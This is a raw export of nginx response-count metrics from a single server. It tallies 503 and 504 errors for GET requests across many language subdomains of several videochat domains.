nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.mx"} 737 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.show"} 1232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.tv.br"} 4057 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vi.videochat.world"} 547 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.cafe"} 2801 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.date"} 1554 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.mx"} 16229 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.show"} 1104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.tv.br"} 8580 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="videochat.world"} 2211 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="vmi460104.contaboserver.net"} 297 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="www.videochat.cafe"} 135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="www.videochat.date"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="www.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="www.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="www.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.cafe"} 789 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.date"} 213 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.mx"} 7068 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.show"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.tv.br"} 3660 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="xh.videochat.world"} 590 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.cafe"} 1598 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.date"} 663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.show"} 427 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.tv.br"} 3918 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="yi.videochat.world"} 717 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.cafe"} 1494 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.date"} 1333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.mx"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.show"} 470 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.tv.br"} 3911 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="zh.videochat.world"} 813 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="af.videochat.cafe"} 169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="af.videochat.date"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="af.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="af.videochat.tv.br"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="al.videochat.cafe"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="al.videochat.date"} 108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="al.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="al.videochat.tv.br"} 94 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="al.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="am.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="am.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="am.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="am.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ar.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ar.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ar.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ar.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ar.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="az.videochat.cafe"} 108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="az.videochat.date"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="az.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="az.videochat.tv.br"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="az.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ba.videochat.cafe"} 146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ba.videochat.date"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ba.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ba.videochat.tv.br"} 94 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ba.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="be.videochat.cafe"} 187 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="be.videochat.date"} 87 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="be.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="be.videochat.tv.br"} 87 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bg.videochat.cafe"} 108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bg.videochat.date"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bg.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bg.videochat.tv.br"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bn.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bn.videochat.date"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bn.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bn.videochat.tv.br"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bs.videochat.cafe"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bs.videochat.date"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bs.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bs.videochat.tv.br"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="bs.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ca.videochat.cafe"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ca.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ca.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ca.videochat.tv.br"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ca.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ceb.videochat.cafe"} 163 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ceb.videochat.date"} 157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ceb.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ceb.videochat.tv.br"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ceb.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="chm.videochat.cafe"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="chm.videochat.date"} 112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="chm.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="chm.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="chm.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cs.videochat.cafe"} 159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cs.videochat.date"} 109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cs.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cs.videochat.tv.br"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.cafe"} 184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.date"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.tv.br"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="cy.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="da.videochat.cafe"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="da.videochat.date"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="da.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="da.videochat.tv.br"} 81 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="de.videochat.cafe"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="de.videochat.date"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="de.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="de.videochat.tv.br"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ee.videochat.cafe"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ee.videochat.date"} 146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ee.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ee.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ee.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="el.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="el.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="el.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="en.videochat.cafe"} 182 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="en.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="en.videochat.tv.br"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eo.videochat.cafe"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eo.videochat.date"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eo.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eo.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eo.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="es.videochat.cafe"} 113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="es.videochat.date"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="es.videochat.tv.br"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="et.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="et.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="et.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="et.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="et.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eu.videochat.cafe"} 152 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eu.videochat.date"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eu.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eu.videochat.tv.br"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="eu.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fa.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fa.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fa.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fi.videochat.cafe"} 188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fi.videochat.date"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fi.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fi.videochat.tv.br"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fr.videochat.date"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fr.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="fr.videochat.tv.br"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.cafe"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.date"} 110 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ga.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gl.videochat.cafe"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gl.videochat.date"} 109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gl.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gl.videochat.tv.br"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gl.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gu.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gu.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gu.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="gu.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="he.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="he.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="he.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="he.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hi.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hi.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hi.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hi.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hi.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hr.videochat.cafe"} 113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hr.videochat.date"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hr.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hr.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ht.videochat.cafe"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ht.videochat.date"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ht.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ht.videochat.tv.br"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ht.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hu.videochat.cafe"} 156 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hu.videochat.date"} 120 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hu.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hu.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="hu.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="id.videochat.cafe"} 176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="id.videochat.date"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="id.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="id.videochat.tv.br"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="is.videochat.cafe"} 160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="is.videochat.date"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="is.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="is.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="is.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="it.videochat.cafe"} 122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="it.videochat.date"} 117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="it.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="it.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="it.videochat.tv.br"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jp.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jp.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jp.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jv.videochat.cafe"} 125 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jv.videochat.date"} 132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jv.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="jv.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ka.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ka.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ka.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ka.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kk.videochat.cafe"} 215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kk.videochat.date"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kk.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kk.videochat.tv.br"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="km.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="km.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="km.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kn.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kn.videochat.date"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kn.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kn.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="kn.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ko.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ko.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ko.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ky.videochat.cafe"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ky.videochat.date"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ky.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ky.videochat.tv.br"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ky.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lb.videochat.cafe"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lb.videochat.date"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lb.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lb.videochat.tv.br"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lo.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lo.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lo.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lo.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lo.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lt.videochat.cafe"} 141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lt.videochat.date"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lt.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lt.videochat.tv.br"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lt.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lv.videochat.cafe"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lv.videochat.date"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lv.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lv.videochat.tv.br"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="lv.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mg.videochat.cafe"} 125 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mg.videochat.date"} 96 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mg.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mg.videochat.tv.br"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mg.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mi.videochat.cafe"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mi.videochat.date"} 121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mi.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mi.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mi.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.cafe"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.date"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.tv.br"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ml.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ml.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mn.videochat.cafe"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mn.videochat.date"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mn.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mn.videochat.tv.br"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mn.videochat.world"} 4 